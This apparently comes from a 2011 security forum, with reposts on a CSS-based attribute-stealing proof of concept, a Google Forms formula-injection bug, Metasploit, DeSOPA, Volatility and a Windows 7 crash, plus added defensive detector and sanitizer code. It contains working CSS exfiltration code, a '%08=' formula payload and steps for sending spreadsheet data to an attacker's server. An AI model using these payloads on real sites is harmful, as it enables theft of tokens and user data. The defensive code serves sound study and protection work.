Tactical Exploitation using CSS
Old Attacks
New Research
New Attacks
Download: http://www.megaupload.com/?d=2E0FY6BJ
Of interest: Access DOM attributes using CSS: This example is just a very simple proof of concept, showing that we can enumerate arbitrary attribute value characters. It performs five positive tests and one negative test, just to be sure. Now, what happens here? First of all you see an animation, resizing a pack of boxes. This is necessary because of a render bug in Webkit, but not necessarily important for the attack itself. I just had to implement it because of a faulty dimensioning of boxes applied with external fonts. So -- the essence of the attack is that we can map attribute content into the DOM by using CSS :after and content:attr(href), for example. This mapped attribute content can be styled with a custom font. The magic is in those fonts: each font is supplied with only one visible character, all other characters having zero dimension. That means that only the dimensioned character will be displayed and all others won't.
@font-face { font-family: TestS; src: url(test_S.svg#TestS) format("svg"); }
@font-face { font-family: TestE; src: url(test_E.svg#TestE) format("svg"); }
@font-face { font-family: TestC; src: url(test_C.svg#TestC) format("svg"); }
@font-face { font-family: TestR; src: url(test_R.svg#TestR) format("svg"); }
@font-face { font-family: TestZ; src: url(test_Z.svg#TestZ) format("svg"); }
@font-face { font-family: TestT; src: url(test_T.svg#TestT) format("svg"); }
div {
    border: 1px solid red;
    height: 20px;
    overflow-x: none;
    overflow-y: auto;
    -webkit-animation-duration: 5s;
    -webkit-animation-name: decrease;
}
div a:after { color:white; }
div.a a:after { content: attr(href); font-family: TestS; }
div.b a:after { content: attr(href); font-family: TestE; }
div.c a:after { content: attr(href); font-family: TestZ; }
div.d a:after { content: attr(href); font-family: TestT; }
div.e a:after { content: attr(href); font-family: TestC; }
div.f a:after { content: attr(href); font-family: TestR; }
So -- only if a character existing in that font is part of the attribute value does the mapped content have dimension. If we squeeze the box a bit, we get a scrollbar, but only if the font-character match is given. This is one of those magic "only one char has dimension" fonts I created for the PoC, testing for the letter S: http://html5sec.org/webkit/test_S.svg That "one char only has dimension" property, combined with the squeezing, means that if we can find out when the scrollbar appears, we know which character is part of the attribute value. Now - how can we create a scrollbar that is able to notify an external resource the second it starts to appear? Well, Webkit has a special feature that allows scrollbars to be fully styled. We can of course also define a background image for a scrollbar. Too bad that if we do so, the image will be fetched onload. So it's more or less useless.
But -- Webkit also supports tons of pseudo classes for scrollbar styles (srsly - tons: http://trac.webkit.org/export/41842/trunk/LayoutTests/scrollbars/overflow-scrollbar-combinations.html - I mean, you know it already I assume). And some of those make sure that background images assigned to the selected elements and states will only be loaded once they actually appear. Bam -- there we have our smart scrollbar of doom.
div::-webkit-scrollbar { width: 12px; }
div.a::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/S); }
div.b::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/E); }
div.c::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/Z); }
div.d::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/T); }
div.e::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/C); }
div.f::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/R); }
Now if we glue the whole thing together, we simply need the following ingredients:
* A CSS injection
* One or two CSRF protected links with a token
* One SVG font per character to determine
* A server listening for incoming requests
The SVG fonts were chosen since they are insanely easy to create. Just set the path and some attributes of every glyph but the desired one to null and done -- we have the perfect font where every character but one is invisible. The animation has to be there because of the aforementioned dimensioning bug - if there's no animation, the background image requests will fire even for those character tests that don't result in a visible character.
@-webkit-keyframes decrease {
    from { width: 340px; }
    50% { width: 105px; }
    100% { width: 340px; }
}
To fully enjoy the demo, make sure you have a look at the Network tab in the developer tools. You'll see requests for the characters S,E,C,R,T - but none for Z. Z was referenced in the demo with a dedicated test as well.
This is our negative test, proving that it really works. So - conclusion: We can enumerate characters via CSS -- that is not new, since SDC et al. did this with the Sexy Assassin back in 2009 (was it?). With Webkit, nevertheless, we can do it FAST and without a massive footprint. My suggestion for a fix would be: simply make sure that scrollbars and their numerous components and states cannot request external resources once they appear/change state -- but fetch their stuff onload, so we can avoid attacks like these. The only thing making this attack work is the fact that some parts of the scrollbar load data from an external machine on visibility/appearance -- and not on declaration in the style sheet. Sursa: http://html5sec.org/webkit/test
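The three ingredients the post names (attribute text mapped into the DOM with content:attr(), a per-character custom font, and a scrollbar background that is only fetched when the scrollbar appears) are all visible in the stylesheet, so a reviewer or a CSS sanitizer can look for them together. The audit below is an added example, not code from the html5sec page; the sample stylesheet is constructed after the PoC and the hosts in it are placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed stylesheet modelled on the PoC above; "exfil.example" and
# "app.example" are placeholder hosts, not anything from the original demo.
SAMPLE_CSS = """
@font-face { font-family: TestS; src: url(http://exfil.example/test_S.svg#TestS) format("svg"); }
div.a a:after { content: attr(href); font-family: TestS; }
div::-webkit-scrollbar { width: 12px; }
div.a::-webkit-scrollbar-track-piece:vertical:increment { background: red url(http://exfil.example/S); }
div.b::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/local/E); }
p { color: blue; background: url(/img/bg.png); }
"""

# One flat "selector { declarations }" block at a time. Nested at-rules such as
# @-webkit-keyframes are not descended into; they carry no url() in this pattern.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")
URL_RE = re.compile(r"url\(\s*[\"']?([^\"')\s]+)")


def url_is_external(url, own_host):
    """True when url() names a host other than the page's own (relative URLs are not external)."""
    host = urlparse(url).hostname
    return host is not None and host != own_host


def audit_css(css, own_host="app.example"):
    """Return (kind, selector[, url]) findings for each attack ingredient present."""
    findings = []
    for selector, body in RULE_RE.findall(css):
        selector = " ".join(selector.split())
        decls = " ".join(body.split())
        external = [u for u in URL_RE.findall(decls) if url_is_external(u, own_host)]
        # Attribute value copied into rendered content (the character source).
        if re.search(r"content\s*:\s*attr\(", decls):
            findings.append(("attr_mapped", selector))
        # Custom font fetched from elsewhere (the one-visible-glyph fonts).
        if selector.startswith("@font-face") and external:
            findings.append(("external_font", selector, external[0]))
        # Scrollbar piece whose background only loads on appearance (the channel).
        if "::-webkit-scrollbar" in selector and external:
            findings.append(("scrollbar_exfil", selector, external[0]))
    return findings


def is_css_exfil_pattern(css, own_host="app.example"):
    """The source and the channel together are the signature of this technique."""
    kinds = {f[0] for f in audit_css(css, own_host)}
    return {"attr_mapped", "scrollbar_exfil"} <= kinds


if __name__ == "__main__":
    for finding in audit_css(SAMPLE_CSS):
        print(finding)
    print("exfil pattern:", is_css_exfil_pattern(SAMPLE_CSS))
```

A Content-Security-Policy that restricts img-src and font-src to the page's own origin removes the same channel at the browser, independently of this check.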
-
[h=3]Excel formula injection in Google Docs[/h][h=2]December 21, 2011[/h] Surely all of you know about the Google reward program for information security researchers who report weak spots in Google resources. We had the chance to participate in this program, too. Here is a short story from @_chipik and @asintsov. One day we needed to conduct a small survey, and we decided to use Google Docs as the platform for the survey. There is an object in Google Docs called Google Forms, and, as obvious from the name, it is used to create various surveys and test forms. After a form is created, its URL is published on the Internet or sent to people who are to participate in the survey. This is how the form looks for a participant: And this is how the author sees the participant's answers: I suppose that any web researcher, upon seeing a form, instinctively puts ‘,",> and other interesting symbols in it? We tried it, too. However, everything was encoded and filtered exactly as planned. Well… But all of the user input is inserted into an Excel table, so why don't we try to inject a formula? Excel formulas start with an “=”. OK, let’s give it a try. Fail. Cunning Google puts a space symbol before the "=" so that the formula is taken for a simple text cell. So how do we get rid of the space? Easy as pie: use backspace. %08 is the hex code of the backspace key. Thus, we wrote in the entry field: %08=1+2+C3 Voila! The formula got inserted into the table just fine. All we had to do now was devise an interesting and practical vector for this particular injection. Google Functions helped us here. With the help of Google Functions it was possible to execute a request to any domain so that the request results got inserted into a specified cell. That gave us the following attack vector:
1) Put sensitive user data into cell A1 (or probably they are already there)
2) Put a formula which makes a GET request to http://own_site.com/secret_data_in_base64 into cell Z666.
3) Read the web server logs, get the data from the cells.
4) Profit!
Soon after describing the bug and the possible attack vector we got the following letter: And a bit later we saw our names in the Google Hall of Fame. Finally, a little Google Hack. Posted by DSecRG Sursa: Digital Security Research Group: Excel formula injection in Google Docs
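The bypass in this story works because the protection (a space before "=") is applied to raw input and then undone by a backspace. The sanitizer below is an added example, not DSecRG's or Google's code: it strips control characters first and then neutralises formula triggers with an apostrophe, so the %08 trick cannot remove the protection. The survey answers it runs over are constructed.

```python
import csv
import io
import re

# Leading characters that make Excel/Sheets treat a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@")
# C0 control characters (backspace \x08 among them) and DEL.
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")


def neutralize_cell(value):
    """Return a cell value safe to drop into a spreadsheet or CSV export.

    Control characters are removed before the formula check, so a backspace
    cannot later erase the protective prefix the way it erased Google's space.
    An apostrophe prefix tells the spreadsheet the cell is text. Values that
    merely start with "-" (e.g. "-1 star") get the prefix too; that is the
    accepted cost of not guessing which ones are harmless.
    """
    cleaned = CONTROL_RE.sub("", str(value))
    if cleaned.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + cleaned
    return cleaned


def looks_like_formula_injection(value):
    """Detection counterpart: would this raw submission be read as a formula?"""
    return CONTROL_RE.sub("", str(value)).lstrip().startswith(FORMULA_TRIGGERS)


# Constructed survey answers; the last one uses the %08 (backspace) trick from the post.
SAMPLE_ANSWERS = [
    ["alice", "Yes, works for me"],
    ["bob", "-1 star, too slow"],
    ["mallory", "\x08=1+2+C3"],
]


def export_csv(rows):
    """Write rows to CSV with every cell neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


if __name__ == "__main__":
    for name, answer in SAMPLE_ANSWERS:
        print(name, looks_like_formula_injection(answer))
    print(export_csv(SAMPLE_ANSWERS))
```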
-
Metasploit Tutorial: An introduction to Metasploit Community
Nytro posted a topic in Tutoriale video
[h=2]Metasploit Tutorial: An introduction to Metasploit Community[/h]Posted by Christian Kirsch on Dec 21, 2011 7:50:48 AM Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product. Scanning Networks with Metasploit Community Basic Exploitation with Metasploit Community Basic Exploitation vs. Smart Exploitation Importing Nexpose Scan Data into Metasploit Using Metasploit Community with Nexpose If you don't have them already, download the free Metasploit Community Edition penetration testing tool and the free Nexpose Community Edition vulnerability scanner now! Videos: https://community.rapid7.com/community/solutions/metasploit/blog/2011/12/21/metasploit-tutorial-an-introduction-to-metasploit-community -
Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 A developer who calls himself T Rizk doesn't have much faith in Congress making the right decision on anti-piracy legislation, so he's built a workaround for the impending censorship measures being considered: DeSOPA. The Firefox add-on is stunningly simple, as the Stop Online Piracy Act (SOPA) would block specific domain names (e.g. The Pirate Bay) of allegedly infringing sites. Firefox, which already boasts an outspoken stance against SOPA, and has already shown they are willing to stand by add-on developers who create circumvention extensions designed to go around measures currently employed by Homeland Security, has welcomed a new add-on, one that is designed to circumvent whatever SOPA website blacklists are created, provided the bills become law. A new anti-SOPA add-on for Firefox, titled “DeSopa”, is such a countermeasure. When installed, users can click a single button to resolve a blocked domain via foreign DNS servers, bypassing all domestic DNS blockades and allowing the user to browse the site through the bare IP address (if supported). “I feel that the general public is not aware of the gravity of SOPA and Congress seems like they are about to cater to the special interests involved, to the detriment of the Internet, for which I and many others live and breathe,” DeSopa developer T Rizk said. “It could be that a few members of congress are just not tech savvy and don’t understand that it is technically not going to work, at all. So here’s some proof that I hope will help them err on the side of reason and vote SOPA down,” he adds. If SOPA is implemented, thousands of similar and more innovative programs and services will sprout up to provide access to the websites that people frequent. SOPA is a mistake. It does not even technically help solve the underlying problem, as this software illustrates.
What it will do is give undue leverage to predatory organizations, cripple innocent third party websites, severely dampen digital innovation and negatively impact the integrity and security of the Internet. If browsing a site through a single IP address is not supported, this other anti-SOPA plugin provides an alternative. Sursa: Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 | The Hacker News (THN)
-
Hunting malware with Volatility v2.0
Frank Boldewin
CAST Forum December 2011 (English edition)
What is Volatility?
- Forensics framework to acquire digital artifacts from memory dumps
- Completely written in Python
- Current stable version is 2.0.1
- Easy to use plugin interface
- Supports the following x86 Windows versions
  - Windows XP SP 2, 3
  - Windows 2003 Server SP 0, 1, 2
  - Windows Vista SP 0, 1, 2
  - Windows 2008 Server SP 1, 2
  - Windows 7 SP 0, 1
Download: http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf
Sursa: CAST Slides: Hunting malware with Volatility v2.0 | Offensive Computing
-
A simple HTML tag will crash 64-bit Windows 7 0-day leaves kernel in the wrong iframe of mind By John Leyden An unpatched critical flaw in 64-bit Windows 7 leaves computers vulnerable to a full 'blue screen of death' system crash. The memory corruption bug in x64 Win 7 could also allow malicious kernel-level code to be injected into machines, security alert biz Secunia warns. Fortunately the 32-bit version of Windows 7 is immune to the flaw, which has been pinned down to the win32k.sys operating system file - which contains the kernel portion of the Windows user interface and related infrastructure. Proof-of-concept code showing how to crash vulnerable Win 7 boxes has been leaked: the simple HTML script, when opened in Apple's Safari web browser, quickly leads to the kernel triggering a page fault in an unmapped area of memory, which halts the machine at a blue screen of death. The offending script is just an IFRAME tag with an overly large height attribute. Although Safari is required to spark the system crash via HTML, modern operating systems should not allow usermode applications to bring down the machine. Microsoft is now investigating the vulnerability, which was first reported by Twitter user w3bd3vil, although the software giant is racing against hackers tracing the code execution path to discover the underlying vulnerability in Windows 7. A video of the Safari-triggered crash along with the HTML PoC can be . Other exploit scenarios might also be possible. Demo: Sursa: A simple HTML tag will crash 64-bit Windows 7 • The Register More info: http://www.pcworld.com/businesscenter/article/246767/new_zeroday_vulnerability_in_windows_7_64bit_may_allow_remote_code_execution.html